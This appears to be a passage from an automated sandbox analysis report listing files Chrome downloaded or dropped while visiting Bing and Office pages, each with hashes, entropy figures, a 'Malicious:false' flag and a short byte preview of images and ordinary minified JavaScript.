                                                                                                    Category:dropped
                                                                                                    Size (bytes):449258
                                                                                                    Entropy (8bit):7.987066102559051
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:d2GTMhzF8cPHvuBGMRBflaF7+smn+i0QuCPSSqjv:d2LZHPHWBrlaw5+HBCqNv
                                                                                                    MD5:1858A1BEB780FEAFE4BBAC77F49ED237
                                                                                                    SHA1:51B892F52A9A288E73578ADC6AA2C3E62C59A63B
                                                                                                    SHA-256:C8119EE0CC14A582FB8BE25EE58C7DFA1D5D4DFE51C8665B03268196D2E5F0C7
                                                                                                    SHA-512:5B2463CFCB7F5FAA4967739AF5D844BE569E22C1103BD7A1AC6DE5DEB42F0AC2E653404294DBE8CE65010E8DD1F4B846557AA16B022ACC4773981EDD754C518D
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:.PNG........IHDR..............Q".....pHYs.........&.:4....sRGB.........gAMA......a.....IDATx...{.mIv....}...{.o.g.g.{f8.k.")r(.,F4ir..I.$G.L.!dG.%...r..!.8.$..8.......$H.......0lQ.dI.H.!..y.3.wwOw..;.*.j...s.E....5s.;g..kW..Z.[.Z.JdO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=..M...iO{...D.....=[z......{.~>...il.g...,}.......9.>..)..L./.../\.....A...I..g...=.iO{.....?Vi'.......o...;.<y%..?..rG.x.{..\..\.ww.....;O.]...9...>...w...{........x|..xx.:].s8d....!..,Y.. 9...o.9'..Z..;9.JI.%....'...Z6..j.P........Z......-..Jm..aI.0Ni....._.WW.Z.....R{._/7..{k.Wz.u.P..n..lW)...........]Z.K.7g.w...X..<....I..
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 198 x 198, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):54612
                                                                                                    Entropy (8bit):7.947657760882351
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:/R7tyU83PW2NChq7BJHJDaslYZ+PKAfDY6+Ian2x:p7tV83PW2NCuBtNaslE+SAfDOVS
                                                                                                    MD5:68F0A51FA86985999964EE43DE12CDD5
                                                                                                    SHA1:BBFC7666BE00C560B7394FA0B82B864237A99D8C
                                                                                                    SHA-256:F230C691E1525FAC0191E2F4A1DB36046306EB7D19808B7BF8227B7ED75E5A0F
                                                                                                    SHA-512:3049B9BD4160BFA702F2E2B6C1714C960D2C422E3481D3B6DD7006E65AA5075EED1DC9B8A2337E0501E9A7780A38718D298B2415CF30EC9E115A9360DF5FA2A7
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://www.bing.com/th?id=OBFB.1E928B2B86E3D4E8ED1D46B83E667303&pid=Fb&qlt=99&r=0
                                                                                                    Preview:.PNG........IHDR................]....gAMA......a.....pHYs..,J..,J.wztM....IDATx^...x.....w.m..[H!m.1.b.,.-&..p.M.n).8...8`......Lb.Y.E.........)....K...s].k.s......}.<.....pw.;....w......pw.;....w......pw.;....w......pw.;....w......pw.;....w......pw.;....AD.!R.=)X...3.....y....3..]?7e..K3...2........:.....O.:....W..$.....7.g.4...v....E.~....w.;.}....W.....i.*NM..<..oK...Q.....y...+.%..RX..U.....4...............C..>/....:.zA..}.....Z...S..c...~..U.........gF.........Twy.M..n.-xH...........?....S....3.x..{^.+......K....o.d.SR..I).....y\*.>&.{...}.J..G...#r.C.T.J.at.Q.=..z.cO.'...SR{.i..x..VjO>.^......./5..~.........oH.2..`Ag...............U.k~Pvl.O.._,.7jm.W......h.o[..=#..D.K.G.l..h...."...q.F{..utc....?@j......`..=4@....z..r..@.[..9t|.4.P.AC......G.c.p.q..:.$zZn......~^......._jn^..~..;+o]...3..t.w..Y?..pw.....{.-...E{.ZU.....-/..l~F.6?)E....-C.d.`).6P.......bg.T.J....D..7A..%J....=. u...^u(An.N.[G.....i8.(....$.....|...i9.OZN.w...K..:;...
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):2278
                                                                                                    Entropy (8bit):7.856767134100099
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:iDKXGoj9PKXto6lKBcIxT/hdMvM3zqNLyGqXKkBeDwRtR5c7upprdE3m:i8v9PKXmTBrMk3zqN4K4e05DppuW
                                                                                                    MD5:AF6A8C1315F461A7580BCDD0AE382928
                                                                                                    SHA1:D5C674FEEE0A2C29B1BE205F090BA91297825B79
                                                                                                    SHA-256:BAE9542A80849780EA4904578B980EE3B3D4845739E4A79ED069120FFB4704F5
                                                                                                    SHA-512:AD913D554E28AED786273064DD34D36DC8C4F0E036D3A1000F39A69C630039B677D346BDB7D0BB8A7489FA78DB42B0DB0F1324C8BC9D65D245596219947877A0
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://th.bing.com/th?id=ODLS.03844a1a-9cd9-494c-9005-5481eccd1dc5&w=32&h=32&qlt=90&pcl=fffffa&o=6&pid=1.2
                                                                                                    Preview:.PNG........IHDR... ... .....szz.....gAMA......a.....pHYs..........(J.....IDATXG..yP....ig.h.Ij26.4...i...).j..<......(......d.Y... ."...Y..AVY...&>.*....V-26m.3s..w..|.{.J..XA..(....I.\_..P.mX.kX.\O.;.O.....u..zf.%.Z..[;4|:....7r...)h.......1.?%Id.....i.....jz.;D5P.l..?..=.FX.x...$.A3i4NM..y..W.e.Y....S.~s...:R|cZ..@.4.. ....nhJ. .....4...Q.....K..t.\.Z.}..1.x.6(sB.. ........e`E..@.4/..........N.rs..0_.v....K.r....1.dI.2...'j.W..|..8v........g. ..B....B3...).`_..;s..B9v.....q.z..z&...t~.#.mD..=.h.^.....d.....%.M{..(..U/.h(........'...>.....sF..qp.&....U..5....../i.e.s.H..C......M...D.[?-A+....C.&..n...m.....O..g.._...M.[2.a.<x..c...UL.Ky.t...<..g..(..Y..C.I....%PV4...mF..a[....`...#.qT.b..._./..ip.g..=..]....I&..N.e..^S.&.3.@ ..2... J...=....f.P.k..[.Z`..'n...Y...F..oRx.......`^.#.g.E..Zy*..R...>T.;.x.}......v.C...[..P.......'.lwhX.=.s.F.L..<*.]....98.4.R......`......M....&.....dz...s.....C>K......6..;_.Q'a...?.7...b~..y^....Z9..s.7...@..
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 2609 x 471, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):698616
                                                                                                    Entropy (8bit):7.988990542773947
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:7B7J02MzM8uOZuft67QhY3HZuppyR3l6Pjk48XOIWoXZQikJSPU7NLRlg:s2MzOOZulaQhY39xMrhQWoXaiwSc7/y
                                                                                                    MD5:A907814C618999761488552FF59ABE52
                                                                                                    SHA1:9328DD8911EFD581DAF9F18649B687C683D93787
                                                                                                    SHA-256:A85710F22BD11B8F228D8B7387F87E5A066FF7CAB256D9719D01881A00FD7CE8
                                                                                                    SHA-512:8982B24CFC82EBD3A6E9DC0C6996B2E04963F60A248DF3EA1C89EFBA52D49E2A6660B0321F4A217BA8778B1D301C43C91598D450D22451EC0F393A38EB8786A4
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://res.cdn.office.net/officehub/images/content/images/unauth-refresh/more-apps-consumer-mreb-a907814c61.png
                                                                                                    Preview:.PNG........IHDR...1..........Y.....pHYs.................sRGB.........gAMA......a.....IDATx...=.vG.&.E..|O...E.@. .P.CC#./.<.C{%S...B.d6...|..]o..b8.Z..5h-.......E.{>{.N......WF....V..p...<....'3.#..h.....?5..<.8..\[\9....oB.. ...8c>.........".~.....{......,w.y-...Q..A..9..#<....M2K..*}.,/.x.CiW2U..G...@.t.s."...k%}.4f.F:...C.-Q.#u.?R..."..y../...;~.Wxq}K. .n.Vr.p*.W..W=.G..G.n...i...|..E..,.?........]9.b..}...-../8.">...U\..6..-..i...xo.........e..u.=.............~.|.n...JZ.M.A_.._.e..7...L........S...O./.|S..|."o...........]\.q].jI.}.5.#M).............o....T..2.,......o.j...;...=.KY..t..e............w...W.... .............A..?.m\.=.../...y.....K..6.{._.._p...?.........?.s..?..\................w..O~...~..?..?k?...z...~k.|..Q.-.@)..o.i.~.a.f.w..>.....O<...+../...o.._....._.j.oso.t^.R..R..bj..M7.t.M7.t.M7.t.M7...D.6.}..g....'...N...../.l......2Wi_..u../~..W...........?w.o+y.tZ.wX.sU..?tL...g....T..j.mG?..C.........k..}..K...5.5.3=.s-.r.._....
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (1333), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1333
                                                                                                    Entropy (8bit):5.118534997873121
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:PlQiztVfI2TdzmkUamV2an3pQ8TIOKEKzbkzER8zXOvD6AYlNyUEr040x0e0v0tn:NQ6rGNIyAbAEuzYDCN2rnWJQSya
                                                                                                    MD5:EEE13BD45C83C7611E9E36689E385FBD
                                                                                                    SHA1:5EA35979E3AC518291E4D7179F417971FD0DC874
                                                                                                    SHA-256:E1DCAF1B7BB92C803802ABAB8D544D277ABF34C06693BD2B83BB598C0DBC7496
                                                                                                    SHA-512:1361145E4C71FC176F76AE84D96F057F8DFA7461FB4926B779F3C059B7C6C8E4BCEFA9B883309D3C3AE6895570F293BF6EEC5374C242C48019CBD6202D4D0373
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:var CaptionClickable;(function(){function t(){for(var i,r=document.querySelectorAll(".b_caption"),u=document.querySelectorAll(".b_imgcap_altitle"),t=0;t<r.length;t++)i=r[t],i&&n(i);for(t=0;t<u.length;t++)i=u[t],i&&n(i)}function n(n){var t=n.previousElementSibling,f,e,o,u,r,s;if(t&&(f=null,t.tagName==="H2"||t.querySelector("h2")?(e=t.tagName==="H2"?t:t.querySelector("h2"),e&&e.querySelector("a")&&(f=e)):t.tagName==="H3"||t.querySelector("h3")?(o=t.tagName==="H3"?t:t.querySelector("h3"),o&&o.querySelector("a")&&(f=o)):f=n.querySelector("h2, h3"),u=n.querySelector("p"),f&&u&&i(u.classList)&&(r=f.querySelector("a"),r))){if(u.addEventListener("mouseover",function(){r&&(r.style.textDecoration="underline",n.style.cursor="pointer")}),u.addEventListener("mouseout",function(){r&&(r.style.textDecoration="",n.style.cursor="")}),s=u.parentElement,s&&s.tagName==="A")return;u.addEventListener("click",function(){if(r){_w.si_T&&_w.si_T(r.getAttribute("h"));var n=window.getSelection();(n===null||n===voi
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3263
                                                                                                    Entropy (8bit):7.905973125916112
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:CXHt+JcNgOSiS4XsAYNpf2ESNkWAuJOdZa:2oONgOLPXsAYnHWfyE
                                                                                                    MD5:21491E31CBFA17CCB55EF1B7AE5E2CCE
                                                                                                    SHA1:3E91D6385F34CD2EED6103772020DB3A1929C078
                                                                                                    SHA-256:BA51ED6AA031FF11F24FCF3325C5F42E37DCEFA222B537DAE955F97642385E37
                                                                                                    SHA-512:F9AD723461B5B971D7E89CBF4CFDB77F8FEA3E919C3712B352FE9E236205D04AA66FA1EAFDCB3CAEC09DB921B3E3C1313EA0A4CC5F102B262A8D383EB991C286
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:.PNG........IHDR................a....gAMA....|.Q.... cHRM...........R...@..}y.....<.....s<.w...9iCCPPhotoshop ICC profile..H..wTT....wz..0.R.....{.^Ea..`(..34.!...ED."HP..P$VD...T..$.(1.ET,oF.........o......Z..../...K......<....Qt.....`.).LVF._.{......!r._...zX..p..3.N....Y.|......9.,...8%K.......,f.%f.(A..9a..>.,....<...9..S.b...L!G....3..,....F.0.+.7..T.3...Il.pX."6.1...."....H._q.W,.d..rIK..s...t......A..d.p....&+..g.].R.......Y2...EE.4...4432..P.u.oJ..Ez...g.........`.j..-....-....b.8....o....M</..A...qVV....2.....O.....g$>...]9.La.....+-%M.g.3Y.......u..A.x....E.....K.......i<:...............Pc...u*@~..(.. ...]..o..0 ~y.*..s..7.g...%...9.%(....3........H.*...@...C`...-p.n.......V..H.....@....A1....jP..A3h..A'8..K....n..`.L.g`......a!2D..!.H... .d..A.P....B....By.f..*...z....:....@..]h...~....L.............C.Up.......p%....;...5.6<.?.........."....G..x...G.....iE..>.&2.. oQ...EG..lQ..P......U..F.Fu.zQ7Qc.Y.G4....G......t...].nB../.o.'.1.......xb"1I.
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 161 x 160, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3974
                                                                                                    Entropy (8bit):7.902382111689997
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:ISobo+jDMIdb9KWszfIwrotnp7hVzMECexHrI1vuE2nvg5vzHJ3k:ISqo+jRAfTIwEtp7hy2HrA2vgNTVk
                                                                                                    MD5:2BE9B68EED69AE75FBA5ED982D0FF25D
                                                                                                    SHA1:BD6E134C0D87C52AC751555269A59796D5EABC55
                                                                                                    SHA-256:8281E85E9FF70034913A38D9EAA6AF52ED98AB621300F0558E70A9BCEFF7246E
                                                                                                    SHA-512:D72E1C8F52D65BBFE2ECDAF9E7A0C209F4F7C385B470DAB7C0979D3D5F1FF29EC14A5E92334676F560DFD22924B0FB983F43FB936EA23F812ED0C639896F8C60
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:.PNG........IHDR.............d.......pHYs.................sRGB.........gAMA......a.....IDATx...u.<..E......B.....X. ... ..T.........X.......G.qf...<..p..u..\[.W#9..zS|..9s...(.?..R.]..9...>..W.v..gR.yS..={...X..eYo9....0J....2.Fu....?..kW...../_..z......?.....}..UT../N..n..X{........Wn.L9.8.........+W..M...)....................r.q...k.....T.4Q7..j..nhcj.&:.*>ST?...q%.4....Fu.N...!.~........'F}.......Mt3D...l..v..B...1u9.`...|...b4.~B........9.Q.sB.:..x,.e;..(.......J2.....I..G.Uo.u....~.z........?...I:.T......9.@..??.?.8.e...N..M.N:!~H.i...q,yG.{^.../Zs26{r1.;a.....c{!...`Q.....EyY...u.%<.k2..1....K.......72.Q...n|.x<."V.{..........w'.W.G.&..L..q.5.'.(8|..kfQ....!....?....Fulf..........9......l.6....+7a..(.h...a0..&........D ....Wk...4.....hY;'....[a....".NSW3.T.&./....9....1}....S.a{d.e..)..c.:.J|..f..I....P.\.?..%._X'...4h...%.../^..K....@....J..[..I....../.....x.0..@.%.q?....k.'.i.R...p.`.Ks@......1'.=Md.b%..P..'.
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 4000 x 2238, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10058400
                                                                                                    Entropy (8bit):7.988307130589743
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:196608:5nHCaQivyot0RWDNzjMqV8CoWF6UquVtmS7ycKUkQfaGG9:ZHCavyI0cDN0qV8rmguVwaKUffaGG9
                                                                                                    MD5:7D5C104D8439CC4A1A9618391A52DFC2
                                                                                                    SHA1:1EACDB703238FC270187A1A23AA77315EE475ED2
                                                                                                    SHA-256:2AB1510CDB2FA03A8CAF6F2CC4A40EBB2B8218922A6AD1F640F4EDD9018E9144
                                                                                                    SHA-512:73446F80AC5B2AB4DEE11CAE312D9486CDF1261DE7BB988F55A5C5269825773964857452705CA6B4B165DCA4DFFE7DD13531CA04804E61210DC950CED900C26F
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:.PNG........IHDR................g....pHYs.................sRGB.........gAMA......a...z5IDATx.....&.&..J........;>..xt..{.....2.I...vu.....T.PJ.Z....K....Ep..16.r..+.........h9......5q.8.?.....0...|<Y@...y6..B..N./..yI....*e\.....d.MzN.X..V_.N..9..2.5.'A.-#...A4.._..S.|...u_.....J.gd.lR..........i.@y,.?.}[|..>.$p'..zi.#]emv%.!.cO...>.n8r..5..Ro.5.......h.....4.'...[....X....@[..U...v.?4D..4,;y>....r=..L...4\_p...r...~.,..<..r...3....!t._E....Ai....M3...'......z.hl#..j=...0.e;..F...9..9..._.....0..}..".k......`I.r...A...1....+.>.`.g...E..|...1.....!..3{=..s@.-1.....343u...)..Z.k..}u.c.....QG.xy.9;. ^...x..!.S....n..z....O.0.l........M..p?..{.o/...?-..?..,.2ur......[....].b.'C..V.&...e.w`..r..|o..;6.....k..9._.|.{{...'..O..7.g..zG.'.#...~...]....g.$.*.F........o..QI..ge{...8w.t.Z.'.:..!./.......x...:.1.s...'.......D....g.Q.*y.>>.-q... ......sH..........G........<H........S..y>.+......_'k...}........i.=e...kN'_I.:..~ZsY..t$o.C..&).0D...S.....
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (14556), with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):14575
                                                                                                    Entropy (8bit):5.276460320889932
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:2Hune5nXDwVMwraBEVw0R/5fA+PKN0etAXVM+iwEv61J:2Hun6nX0naBEW0R/FDuRqXawEviJ
                                                                                                    MD5:E4A47339EFFE4B794768D0003D047639
                                                                                                    SHA1:AA46FEB160A438B7C83E10D50B116CC02A6916B6
                                                                                                    SHA-256:ABEE06196571EF5177889710CD9C7D748B11E054BB5469C097A747AC399D6886
                                                                                                    SHA-512:993E5E27230F8831DDFF140735ECACFCC831FC2712A4EADAD36D1C3E8799609E2FE13D904ECF01AB9286BC085F81B3B26792D382103496402105DB215B5AB941
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://www.bing.com/news/NewsAnswerV2CarouselAjax?q=Office&width=608&nccl=Lite&IG=33097A094B7E4685822C3A3929157F3C&IID=NEWS.401&SFX=0&disablecarousel=1&OMWQ=0
                                                                                                    Preview:<div class="na_cai" url="https://www.msn.com/en-us/technology/tech-companies/early-microsoft-leaders-go-all-in-on-ai-with-seattle-area-startup-total-neural-enterprises/ar-AA1wnuyp" titletext="Early Microsoft leaders go all in on AI with Seattle-area startup Total Neural Enterprises" data-priority="2"><div class="na_card_wrp na_ccw_wrp" data-priority="2"><a class="na_ccw tc r_img" url="https://www.msn.com/en-us/technology/tech-companies/early-microsoft-leaders-go-all-in-on-ai-with-seattle-area-startup-total-neural-enterprises/ar-AA1wnuyp" data-priority="2" titletext="Early Microsoft leaders go all in on AI with Seattle-area startup Total Neural Enterprises" href="https://www.msn.com/en-us/technology/tech-companies/early-microsoft-leaders-go-all-in-on-ai-with-seattle-area-startup-total-neural-enterprises/ar-AA1wnuyp?ocid=BingNewsSerp" h="ID=NEWS.401_0,5008.1"><div class="citm_img"><div class="imagewrap"><img title="Early Microsoft leaders go all in on AI with Seattle-area startup Total N
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 53 x 12, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):1591
                                                                                                    Entropy (8bit):7.825806667159923
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:Jt24EHVomy99TFO7SmsrAzRTmBLbtTM2uTok7SemuvNRePD9n8AuwlFynTjhfITQ:Jum9TFOw+TiTMok7SesR8A3F8T9Ay1
                                                                                                    MD5:2FECE3531698E70623E13F45393733E4
                                                                                                    SHA1:F904AD004ED81D6FD6EC16CC29685327F2E3EA95
                                                                                                    SHA-256:2B7A5B78F928B02DB3CA8EB7F74101B5B897C9E487F2119277D9CD113D59C75A
                                                                                                    SHA-512:29AC2E72CD32E31B1AA49C9BCCAB92BB4A92CE1AD94B35FB2DA7EEF774769F22548307A60A2CF012FC368B94720F18A994F4F14EEF52AD3603158565B7AA93F3
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://www.bing.com/th?id=OJ.niIvNESEkqe9fA&pid=news&w=53&h=12&rs=2
                                                                                                    Preview:.PNG........IHDR...5................sRGB.........gAMA......a.....pHYs..........o.d....IDATHK}VilTU.~.....m.....u.2.4...F.q.5.....!.H4...!n. ...h")"N.-3C[.b..XLT\.....V.YjY.2~..{u .In_.9.{...Q..55NAu.WX[....TA..\Q.R.Bn~.p..dO...5.U....B\...XNI]4P..(#S%.XcQ...%...d.i{jmA..,e.e...j<...'.....3d]...).n..t.om.=.V..p....P...+...(O.K .....E...E.g]a....n...Li.u......f..}..l7.D..j..=.<......;+&.N.\~H.Jl$...~.(.s..........\.Tf.l..f.......O.f...G.>..B.4.@f.y=..K.... _.o...n..,..Y.]'......./K..jN...p~...+....DP.i.'.3.....i.36/.+..%..0_C......X.Sj..*.V......)a..PJ...e.,..$..CV7..r..cW:.uU..ocQ.p..(.W'.O..5,__..#.O..0S ..e.....K..aw7.HP@..-.*...7..Z.G\..s/R...^~]...d.F7q..U..?.3(k..0.!...'x..SN.5..nk.9d......I=.?%UfgQ.>l..+....../.........\...dK...7........0...x....o S?.1\xs >..I<......4...).|.....p.3... ...........9.X..g5...$..#.{.$.9@}.........i.6;YM..Ia...vW....qF...I.vDc....@.@.XjM...8.M.u..]....."k.p~..x.1...+..4..R_...y.c.....+I.............X..A$5c^3.x#.
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (3010), with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):3010
                                                                                                    Entropy (8bit):5.226871204129987
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:OyuzAwlEG4zh4q8m1FLP2OM+53rW2m7r1zSQh1jyaQ6wsDm:MQG4zhvLuOM+ZW/1rj7Q6wgm
                                                                                                    MD5:12AE5624BF6DE63E7F1A62704A827D3F
                                                                                                    SHA1:C35379FC87D455AB5F8AEED403F422A24BBAD194
                                                                                                    SHA-256:1FB3B58965BEBC71F24AF200D4B7BC53E576D00ACF519FB67FE3F3ABDEA0A543
                                                                                                    SHA-512:DA5F5485E1E0FEB2A9A9DA0EAA342EDAEEEFAF12CE4DCD50D0143BF476356CB171BD62CB33C58E6D9D492D67F281982A99FEF3BFD2EBB9E54CF9782F7B92C17B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/w1N5_IfUVatfiu7UA_Qioku60ZQ.js
                                                                                                    Preview:var Swipe;(function(n){function i(n){var i=null,e,r,u,f;return"touches"in n?(e=n,r=e.targetTouches,r&&r.length==1&&(i={pageX:r[0].pageX,pageY:r[0].pageY})):t?(u=n,i={pageX:u.clientX,pageY:u.clientY}):(f=n,i={pageX:f.pageX,pageY:f.pageY}),i!=null&&(i.pageY+=_w.pageYOffset),i}function r(n){var e="getSelection",f=_w[e]||_d[e],t="",i,r,o,u;return f?(i=f(),t+=f(),n&&t!==""&&i.getRangeAt&&(r=i.getRangeAt(0),o=r&&r.getClientRects&&r.getClientRects.length,o>0&&i.removeAllRanges())):_d.selection&&(u=_d.selection,t+=u.createRange().text,n&&t!==""&&u.empty&&u.empty()),!!t}function e(n){sj_pd(n);r(!0)}function o(n,e,o,s,h,c,l,a,v,y){var w,rt,ut,it;o===void 0&&(o=_d.body);s===void 0&&(s=50);h===void 0&&(h=function(){});c===void 0&&(c=function(){});l===void 0&&(l=function(){});a===void 0&&(a=!1);v===void 0&&(v=!1);y===void 0&&(y=2);y=Math.max(y,2);var p=new u,b=null,k="touchstart",d="touchmove",g="touchend",nt="touchout",tt=a||!f;"ontouchstart"in _d.documentElement?(k="touchstart",d="touchmove",g="t
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 973 x 675, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):279269
                                                                                                    Entropy (8bit):7.994566583539726
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:RiwpUTuOsjVbgT94HFlcTY+/+T8tDtnSTFaslpolHpMerO+lMbQfVwv6p1YH:XG+jB894HFGTVw8QgGbMY
                                                                                                    MD5:8548B8B68D33DBF376420E679FC84996
                                                                                                    SHA1:7A277E16B935833A6403DEAD1CF5A7661F20DB24
                                                                                                    SHA-256:CDFE0542BE718F847059F73ABC6EF56387109AB760D5530046F2EF9EDB25ED31
                                                                                                    SHA-512:AED4FD1D6EBACFBBECBCCAE8CF4F4F13319D355723CF16F830C315884FCDE9EDAA929E5EEF78A36006FC0412AB1224AF311906883BA7391DF7165D7F3D808E00
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://res.cdn.office.net/officehub/images/content/images/unauth-refresh/highlight-commercial-2-mreb-8548b8b68d.png
                                                                                                    Preview:.PNG........IHDR.............'?.k....pHYs.........&.:4....sRGB.........gAMA......a...BzIDATx...[...u...1...>..bU.b..)..).%9.":blK.,..0....v...@.h4........~k.../...:p.8.a'...u.,Z$-.WU...?g........"e.UG..<..^...c.o..E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-..'.E........^...D.....J..|.9}........)}.zq..~..Y.O_........?.....=...}..s<..?....=.q{Vy....o\.=.~t.l~??......@;..s...
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 72x72, components 3
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1026
                                                                                                    Entropy (8bit):7.204807905949738
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:EGKgTY89p7NsdzFXC0KslX0XuFN46p6dMUw:EbgTY8tszFxKslX08qGEM
                                                                                                    MD5:168D1A8F06909C67D7A539476936AF3A
                                                                                                    SHA1:C9E36ABE53804CFC3377FCFF985AB7A5D4EAE3D7
                                                                                                    SHA-256:D10C34A6E21BC3636A4D4F5DF8F8DB6A239A8C8DF7A645B313A23B1569F3F50C
                                                                                                    SHA-512:285020DDE9D8EF4113A0B1691961D43BB1DE0E9A2AC26EE3B65B996F8ED9862AE5FD16AF7F117AE7EE294BBCE261E9A068263432DCF2A897621D98D243864B9B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:......JFIF...................................."....."3 % % 3-7,),7-Q@88@Q^OJO^qeeq............................"....."3 % % 3-7,),7-Q@88@Q^OJO^qeeq............H.H.."...............................................0....r.45.S..\.....G./6z.ia..^.`..=.......................................'JL...\.................................a..1..!03Q."#2RrAeq........?..<.g...r.g...r.|.g..h.E.S.i.D..#.....mk ..u..!..}.9V.;.3.m. .C$.,......W.;:.B]..I.g..8.5.E....0d.3..q.=b{...Z.62q.!.)JDF1..}.U.N..*ZE....,..?n..l....FE........~....}.?./<N.;..M...e....L./.D..d....1...{iDb8D}.He.W..dm...K..Q..#..l.f..Y.ck.~...C.._. ..9......j..l.\.....0.s. p.lI}.JM.$Xmhy..I+.#....r.....&.)..h..B$x..y..Go..j..Zf..Y...K....E.].....a.......kW....V.O.Bq.......V.X...$.......B.%.!YB5I(.?O....u:..uf.D...N....z..c.?......$........jU}cQ..:...F#...:e=V..vV.I.K:.`:O.....Zd.QZ......'....s.q.9.8............................ ..0q........?..m[mIf........b.${........................... a....0........?.
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (1495), with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):1495
                                                                                                    Entropy (8bit):5.2715271964580745
                                                                                                    Encrypted:false
